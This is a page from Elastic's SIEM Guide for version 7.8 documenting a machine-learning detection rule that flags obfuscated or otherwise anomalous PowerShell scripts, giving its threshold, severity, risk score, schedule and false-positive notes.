Suspicious Powershell Script | SIEM Guide [7.8]

The SIEM app is now a part of the Elastic Security solution. Click here to view the current documentation.
IMPORTANT: No additional bug fixes or documentation updates will be released for this version.

› › ›

« Suspicious PDF Reader Child Process Svchost spawning Cmd »

Suspicious Powershell Scriptedit

A machine learning job detected a PowerShell script with unusual data characteristics, such as obfuscation, that may be a characteristic of malicious PowerShell script text blocks.

Rule type: machine_learning

Machine learning job: windows_anomalous_script

Machine learning anomaly threshold: 50

Severity: low

Risk score: 21

Runs every: 15 minutes

Searches indices from: now-45m (Date Math format, see also Additional look-back time)

Maximum signals per execution: 100

References:

https://www.elastic.co/guide/en/siem/guide/current/prebuilt-ml-jobs.html

Tags:

Elastic
ML
Windows

Version: 1

Added (Elastic Stack release): 7.7.0

Potential false positivesedit

Certain kinds of security testing may trigger this signal. PowerShell scripts that use high levels of obfuscation or have unusual script block payloads may trigger this signal.

« Suspicious PDF Reader Child Process Svchost spawning Cmd »